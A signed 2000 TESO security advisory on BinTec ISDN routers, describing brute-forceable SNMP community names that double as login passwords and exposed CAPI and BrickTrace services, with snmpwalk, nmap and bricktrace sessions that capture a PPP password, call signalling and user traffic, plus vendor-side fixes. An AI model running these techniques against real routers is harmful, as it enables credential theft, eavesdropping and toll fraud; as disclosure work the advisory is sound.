TESO Security Advisory #9 - BinTec router security and privacy weakness. By using SNMP brute-force-techniques for SNMP community-names one is able to remotely gain the management accounts passwords, which are the same as the SNMP community names. Additionally the MIB-Tree holds security related information which should not be accessible through read-only/SNMP. These routers also offer services which can be abused rather easily, like dialing out and getting full line access via a CAPI interface, or a debugging interface which gives you all information which is sent over the BRI-lines.
1e4c21598191f4df1d64c9019b1d5c2ae2c88d693bdec2cd20552f3e94bb6c36
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------
TESO Security Advisory
2000/03/30
BinTec router security and privacy weakness
Summary
===================
By using SNMP brute-force-techniques for SNMP community-names one is able
to gain the management accounts passwords, which are the same as the SNMP
community names.
Additionally the MIB-Tree holds security related information which should
not be accessible through read-only/SNMP. These routers also offer services
which can be abused rather easily, like dialing out and getting full line
access via a CAPI interface, or a debugging interface which gives you all
information which is sent over the BRI-lines.
(Those services are open as default and the debugging service is barely
documented)
Systems Affected
===================
BinTec ISDN router family
tested: BIANCA/BRICK-XL
BIANCA/BRICK-XS
Tests
===================
(1) Example system setup for examples given
___________________________________________________________________________
admin Login Password/SNMP Community bitkoenig
read Login Password/SNMP Community rince
write Login Password/SNMP Community guenthi
defaults are: admin/bintec read/public and write/public
(2) Example of Read-Only SNMP output from a BinTec router
___________________________________________________________________________
syslog:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
[...]
enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
local IP address is 195.202.40.124, remote is 195.202.32.121"
enterprises.272.4.1.12.1.4.954440116.7.40 =
"LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
enterprises.272.4.1.12.1.4.954440685.7.41 =
"LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
enterprises.272.4.1.12.1.4.954440692.7.42 =
"citykom-muenster: outgoing connection closed, duration 583 sec, 18194
bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
enterprises.272.4.1.12.1.4.954440692.7.43 =
"ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
609910,7/0,0,0B,citykom-muenster"
[...]
capi-user-db:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
/* username */
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
/* password */
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
/* capi access activated */
(3) Remote CAPI Server on a BinTec router
___________________________________________________________________________
fefe:> ps -elf
[...]
S 0 26 1 28 0 Jan 1 ? 00:00 00:00 vcapid
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 6000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp X11
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
(4) BrickTrace Server on a BinTec router:
___________________________________________________________________________
fefe:> ps -elf
[...]
S 0 24 1 28 0 Jan 1 ? 00:04 00:01 traced
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 7000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp afs3-fileserver
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
(5) BrickTracing a password from an outgoing PPP connection
___________________________________________________________________________
bitch:~$ bricktrace -h2pi 1 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 1 Unit 0 Slot 2 /* Tracing the B-Channel */
[...]
020721.320 X DATA[0025]
0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69 ...#.....user
0010: 73 07 72 65 74 68 6f 6f 6f .password
PPP packet protocol 0xc023 (PAP)
ID 1 PAP Authenticate-Request Peer-ID user Password password
A=FF UI
[...]
(6) Snooping an S0 Bus for telephone calls
___________________________________________________________________________
bitch:~$ bricktrace -h3 0 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 0 Unit 0 Slot 2 /* Tracing the D-Channel */
[...]
021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ...............
PD=08 Dest CR=01 SETUP ACKNOWLEDGE
IE-Element : Channel Identification :
Interface implicitly identified
Interface type S0
Channelnumber is exclusive (accept only this)
Identified Channel is not D-Channel
Selected Channel : B1-Channel
IE-Element : Progress Indicator reports
In-band information now available
[...]
021105.366 R DATA[0008]
0000: 02 b3 12 2e 08 01 81 02 ........
PD=08 Dest CR=01 CALL PROCEEDING
021108.076 R DATA[0012]
0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88 ............
PD=08 Dest CR=01 ALERT
IE-Element : Progress Indicator reports
In-band information now available
[...]
021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112
PD=08 Dest CR=01 CONNECT
IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
IE-Element : Unknown IE-Element 0x4c in Codeset 0
[...]
021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten
PD=08 Dest CR=01 RELEASE
IE-Element : Facility
Service discriminator is supplement. application
Component tag is invoke
integer (0x2)
50231
integer (0x1)
34
sequence (0xa)
{
GetNextRequest (0x5)
{
sequence (0x3)
{
integer (0x1)
0
}
}
GetResponse (0x1)
}
IE-Element : Display : 0 Einheiten
[...]
(7) Checking line status from BinTec's httpd:
___________________________________________________________________________
[...]
Hardware Interfaces
Slot 1 Ethernet o.k.
Slot 2 ISDN S2M o.k. used 13, available 17
- - X X X X X - X -
- - X - X - - X - -
X - - - X - - X - X
[...]
now we know what to sniff:
sniffing an inbound ppp connection on line 4 slot 2:
bitch:~$ bricktrace -h2pit 4 0 2
bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
Tracing: Channel 4 Unit 0 Slot 2
[...]
004419.999 X DATA[0045]
0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
0020: 7a 60 12 44 70 3c z.Dp<
Compressed PPP packet protocol 0x21 (TCP/IP)
A=21 RNR P/F=0 N(R)=2
IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6
TCP-Message, sourceport 80 destinationport 55929
sequence number 3170412967
acknowledgement number 36423034
offset 6 flags ACK SYN
window 17520 checksum 0x3c9e urgent 0
[...]
004420.640 R DATA[0609]
0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f -p..C.GET http:/
0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e /chat3.playgroun
0020: 64 2e 64 65 2f 63 d.de/c
Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
A=2D I P/F=1 N(R)=3 N(S)=0
0E B0 C FF G E T h t t p : / / c h a t 3
. p l a y g r o u n d . d e / c h a t
IP-Packet from a to b protocol 0x2f
[...]
Impact
===================
(1) SNMP communities / login passwords
___________________________________________________________________________
By using standard brute-force methods, the SNMP community string, and
therefore the login's passwords can be obtained. A program doing this
is for example ADMsnmp, which has to be feeded by a wordlist. Bruteforcing
this way is quite effective, you get about 500-1000 words per minute.
(which of course depends on your and the routers connectivity) You can get
this program from [4]. Bruteforcing the passwords directly via telnet isn't
possible because the router slows down after approx. 6 tries.
(2) Using the CAPI facility
___________________________________________________________________________
Nearly any router can remotely be used as 'ISDN-Line provider' - you can
use the BRI-Lines of the router if they are not password protected.
While doing a short survey most machines we encountered were proven
to be vulnerable, so they didn't have any restrictions set. The CAPI
daemon listens on port 6000 as you can see in the 'Tests' section.
This feature can, for example be exploited by dialing expensive numbers
(0900 or 0190 [in DE] lines). You may also hide your real identity by
calling a 'call-by-call' ISP who gives you another IP you can deal with.
A (R)CAPI library for Un*x exists, which can be used for these attacks.
It is available via [5]. There is also a CAPI user interface for MS Windows,
which is called Brickware and can be obtained via [6].
Firmware before 5.1.x seems to be generally not passworded, we have not
checked 5.1.x yet.
(3) Using BrickTrace for snooping BRI-Lines
___________________________________________________________________________
You can gain information of the ISP or corporation running these routers
with open BrickTrace ports (Port 7000, default) with a program called
bricktrace, which is available via [7]. In the documentation this
port isn't even stated (!). See 'Solution' for how to turn off this port.
As you can see the whole data passing the line, so you also get the users
passwords and see what they do in the net (it is in a way like a dedicated
sniffer). Using this technique of sniffing you may also see private
information of corporations, not only restricting you to Internet
traffic but also on 'intranet' lines that use the same router, as well
as telephony networks (S0 bus).
Explanation
===================
BinTec Communications seems to rely on security by obscurity. Neither the
severity of these services, nor how to configure them are mentioned
properly in their documentation.
However, BinTec routers *can* be secured, it just seems not to be common
knowledge.
In addition to this, it seem to be quite useless to provide RCAPI
facilities on a router which is mainly used for dial-in purposes. If one
needs those abilities, encrypted management access would be appropriate.
Solution
===================
SNMP: disable (admin.biboAdmSnmpPort=0)
(admin.biboAdmSnmpTrapPort=0)
RCAPI: disable or password protect
(admin.biboAdmCapiTcpPort=0)
BrickTrace: disable
(admin.biboAdmTraceTcpPort=0)
Just manage your Router through serial line, because if your connection
gets sniffed, these services can be reactivated.
Acknowledgments
================
The bug-discovery and the demonstration are due to Stephan Holtwisch [2]
This advisory has been written by Stephan 'rookie' Holtwisch and hendy.
Contact Information
===================
The TESO crew can be reached by mailing to teso@coredump.cx.
Our web page is at [1].
References
===================
[1] TESO
http://teso.scene.at/ or https://teso.scene.at/
[2] Stephan Holtwisch
sholtwis@muenster.de
[3] BinTec Communications
http://www.bintec.de
[4] ADMsnmp - bruteforce SNMP communities
ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
[5] libcapi for RCAPI (Unix)
ftp://ftp.bintec.de/pub/brick/libcapi/
[6] BrickWare (CAPI software for windows)
ftp://ftp.bintec.de/pub/brick/brickware/
[7] BrickTrace (BRI-Line snooping)
ftp://ftp.bintec.de/pub/brick/unixtool/
Disclaimer
===================
This advisory does not claim to be complete or to be usable for any
purpose. Especially information on the vulnerable systems may be
inaccurate or wrong. The supplied information is not to be used for
malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include
at least links [1] and [2].
- ------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE45biacZZ+BjKdwjcRAlQaAJ9ozxk8JlFuEZSA0br4u+d3+CbfgACgjLHx
fDJT2mFXDx4xRzzE7Da7pD8=
=d2XM
-----END PGP SIGNATURE-----